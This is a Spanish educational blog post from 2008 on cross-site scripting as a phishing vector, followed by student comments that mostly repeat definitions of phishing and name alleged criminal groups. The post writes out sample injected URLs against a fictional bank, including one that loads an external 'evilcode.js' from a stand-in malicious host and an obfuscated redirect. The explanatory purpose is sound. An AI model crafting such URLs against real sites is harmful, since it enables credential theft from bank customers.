lunes, 17 de marzo de 2008

Variables del Phishing. • Cross-Site scripting

El ataque “Cross-Site scripting “(comúnmente referido a CSS o XSS) esta basado en la explotación de vulnerabilidades del sistema de validación de HTML incrustado. El problema es que normalmente no se valida correctamente. Esta vulnerabilidad puede estar presente de forma directa (foros, mensajes de error) o indirecta (redirecciones, framesets). Cada una se trata de forma diferente. En general, estas técnicas de CSS son el resultado de un desarrollo pobre de aplicaciones WEB.
Mientras hay numerosos vectores para el llevar al cabo un ataque de CSS, los Phishers pueden usar ataques de URL formateadas. Los formatos típicos para la inyección de CSS en URL válido incluyen:

i. La sustitución integra del protocolo de transferencia de hipertexto tal como:
“http://mibanco.com/ebanking?URL=http://sitio.com/fakepage.htm”

ii. Inline conteniendo código embebido, tal como:
“http://mibanco.com/ebanking?page=1&client=< script>sitiospoof...”

iii. Forzar la página para cargar código externo, tal como:
“http://mibanco.com/ebanking?page=1&response=malsitio.com%21evilcode.js&go=2”
Por ejemplo: se recibe en un correo electrónico de un Phishers la siguiente URL:
“http://mibanco.com/ebanking?URL=http://sitio.com//fakepage.htm”
Mientras el cliente es dirigido verdaderamente y es conectado a la aplicación verdadera del Web de MiBanco, debido a la mala codificación de la aplicación del banco, el componente de ebanking aceptará una URL arbitraria para la inserción del contenido de esa localización. Una vez insertado el código spoof dentro de la página, que podría ser el formulario de autenticación, el phisher ha logrado controlar una página dentro de un servidor externo (http://sitio.com//fakepage.htm).
Desgraciadamente, al igual que con la mayoría de las vulnerabilidades de CSS, el cliente no tiene manera de autentificar dicha página. Mientras que en el ejemplo la URL puede parecer obvia, el atacante la podría ofuscar fácilmente utilizando las técnicas explicadas anteriormente. Por ejemplo, http://stio.com/fakepage.htm puede ser:
“http%3A%2F%2F3515261219%C0%AEfakepage%2Ehtm”

13 comentarios:

superdorada dijo...

Parece ser que el tema va referido a los peligros de las redes por el uso de Grupos Organizados los cuales usan estas vías para material malicioso.

Anónimo dijo...

personalmente y por lo que he visto hasta ahora, me parece que Nicolay Ivanov es flyman, y que todo se relaciona con Nevacon y akimon.
Seguiré en ello, pero hasta la semana que viene me será dificil avanzar en ello.

Fdo. Luis Ciffer

nuria dijo...

Este primer artículo nos habla de como cruzar des de la página principal la página incrustada por el phisher sin que pueda ser autentificada por el usuario.

Nuria Pujol Gutierrez
11339860

nuria dijo...

Este primer artículo va referido a como cruzar desde la página principal la página incsrustada por el phisher sin que pueda ser autantificada y detectada por el usuario el cual accede creyendo que es el vínculo que esta buscando.

Nuria Pujol Gutierrez
11339860

superdorada dijo...

Como tenemos bastante información sobre el PHISING intentaré ampliar un poco el tema.
Así referente a tipologías de los atacantes es la utilización del propio código de programa del banco o servicio por el cual se hace pasar contra la víctima. Éste se dirige al usuario para iniciar sesión en la propia página del banco o servicio, donde la URL y certificados de seguridad parecen correctos. Es en el "Cross Site Scripting" donde los usuarios reciben un mensaje diciendo que tienen que verificar sus cuentas, seguido por un enlace que parece la página web auténtica, éste está modificado para recibir un ataque.
También el manejo del nombre de dominio en los navegadores es otro problema, ya que puede ser que las direcciones que aparezcan iguales puedan conducir a diferentes sitios, siendo posible dirigir a los usuarios a páginas web fraudulentas.

Código: 62KTN

Jesus dijo...

Como referente de organización criminal dedicado al fraude a la Banca Online o Phishing, tenemos a la Russian Business Network (RBN), con sede en San Petesburgo, y cuyo líder es el denominado “Flyman”. Como administrador figura Nicolay Ivanov. Asimismo, RBN comprende un grupo de empresas, como Akimon y Nevacon.

Sin embargo, se constata últimamente un trasvase de la actividad hacia países donde la legislación sobre seguridad en la Red no se encuentra aún desarrollada, o donde la banda ancha está en fase de expansión. Así, se ha pasado de la Russian Business Network, hasta ahora el paraíso de los 'hackers', a la "China Business Network.

Estos hackers utilizan, además de correos fraudulentos, la ingeniería social para obtener información confidencial a través de la manipulación de usuarios legítimos.

20KGD

Jesus dijo...
Este comentario ha sido eliminado por el autor.
nrl_neus dijo...

Phishing es un término informático que denomina un tipo de delito encuadrado dentro del ámbito de las estafas, y que se comete mediante el uso de un tipo de ingeniería social caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria). El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea1 o incluso utilizando también llamadas telefónicas.2
Dado el creciente número de denuncias de incidentes relacionados con el phishing se requieren métodos adicionales de protección. Se han realizado intentos con leyes que castigan la práctica, campañas para prevenir a los usuarios y con la aplicación de medidas técnicas a los programas.
Así el ususario reiendo que esta accediendo a una pagina segura, el phisher esta consiguiendo infomación privilegiada sobre la víctima.

nrl_neus dijo...

Phishing es un término informático que denomina un tipo de delito encuadrado dentro del ámbito de las estafas, y que se comete mediante el uso de un tipo de ingeniería social caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria). El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea1 o incluso utilizando también llamadas telefónicas.2
Dado el creciente número de denuncias de incidentes relacionados con el phishing se requieren métodos adicionales de protección. Se han realizado intentos con leyes que castigan la práctica, campañas para prevenir a los usuarios y con la aplicación de medidas técnicas a los programas.
Así el ususario reiendo que esta accediendo a una pagina segura, el phisher esta consiguiendo infomación privilegiada sobre la víctima.

Anónimo dijo...

Phishing es un término informático que denomina un tipo de delito encuadrado dentro del ámbito de las estafas, y que se comete mediante el uso de un tipo de ingeniería social caracterizado por intentar adquirir información confidencial de forma fraudulenta.

El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea o incluso utilizando también llamadas telefónicas.

El término phishing proviene de la palabra en inglés "fishing" (pesca)haciendo alusión al acto de pescar usuarios mediante señuelos cada vez más sofisticados, y de este modo obtener información financiera y contraseñas. Quien lo practica es conocido con el nombre de phisher.También se dice que el término "phishing" es la contracción de "password harvesting fishing" (cosecha y pesca de contraseñas), aunque esto probablemente es un acrónimo retroactivo.

Son posibles traducciones apropiadas en español los términos anzuelo o estafa electrónica.

La mayoría de los métodos de phishing utilizan alguna forma técnica de engaño en el diseño para mostrar que un enlace en un correo electrónico parezca una copia de la organización por la cual se hace pasar el impostor. URLs mal escritas o el uso de subdominios son trucos comúnmente usados por phishers, como el ejemplo en esta URL, http://www.nombredetubanco.com.ejemplo.com/.

Jéssica Castilla

Anónimo dijo...

Phishing es un término informático que denomina un tipo de delito encuadrado dentro del ámbito de las estafas, y que se comete mediante el uso de un tipo de ingeniería social caracterizado por intentar adquirir información confidencial de forma fraudulenta.

El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea o incluso utilizando también llamadas telefónicas.

El término phishing proviene de la palabra en inglés "fishing" (pesca)haciendo alusión al acto de pescar usuarios mediante señuelos cada vez más sofisticados, y de este modo obtener información financiera y contraseñas. Quien lo practica es conocido con el nombre de phisher.También se dice que el término "phishing" es la contracción de "password harvesting fishing" (cosecha y pesca de contraseñas), aunque esto probablemente es un acrónimo retroactivo.

Son posibles traducciones apropiadas en español los términos anzuelo o estafa electrónica.

La mayoría de los métodos de phishing utilizan alguna forma técnica de engaño en el diseño para mostrar que un enlace en un correo electrónico parezca una copia de la organización por la cual se hace pasar el impostor. URLs mal escritas o el uso de subdominios son trucos comúnmente usados por phishers, como el ejemplo en esta URL, http://www.nombredetubanco.com.ejemplo.com/.

Jéssica Castilla

Jéssica dijo...

Phishing es un término informático que denomina un tipo de delito encuadrado dentro del ámbito de las estafas, y que se comete mediante el uso de un tipo de ingeniería social caracterizado por intentar adquirir información confidencial de forma fraudulenta.

El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea o incluso utilizando también llamadas telefónicas.

El término phishing proviene de la palabra en inglés "fishing" (pesca)haciendo alusión al acto de pescar usuarios mediante señuelos cada vez más sofisticados, y de este modo obtener información financiera y contraseñas. Quien lo practica es conocido con el nombre de phisher.También se dice que el término "phishing" es la contracción de "password harvesting fishing" (cosecha y pesca de contraseñas), aunque esto probablemente es un acrónimo retroactivo.

Son posibles traducciones apropiadas en español los términos anzuelo o estafa electrónica.

La mayoría de los métodos de phishing utilizan alguna forma técnica de engaño en el diseño para mostrar que un enlace en un correo electrónico parezca una copia de la organización por la cual se hace pasar el impostor. URLs mal escritas o el uso de subdominios son trucos comúnmente usados por phishers, como el ejemplo en esta URL, http://www.nombredetubanco.com.ejemplo.com/.

Jéssica Castilla

Jéssica dijo...

Phishing es un término informático que denomina un tipo de delito encuadrado dentro del ámbito de las estafas, y que se comete mediante el uso de un tipo de ingeniería social caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria). El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea[1] o incluso utilizando también llamadas telefónicas.[2
El término phishing proviene de la palabra en inglés "fishing" (pesca)[3] haciendo alusión al acto de pescar usuarios mediante señuelos cada vez más sofisticados, y de este modo obtener información financiera y contraseñas. Quien lo practica es conocido con el nombre de phisher.
La mayoría de los métodos de phishing utilizan alguna forma técnica de engaño en el diseño para mostrar que un enlace en un correo electrónico parezca una copia de la organización por la cual se hace pasar el impostor. URLs mal escritas o el uso de subdominios son trucos comúnmente usados por phishers.

Jéssica Castilla

Web Statistics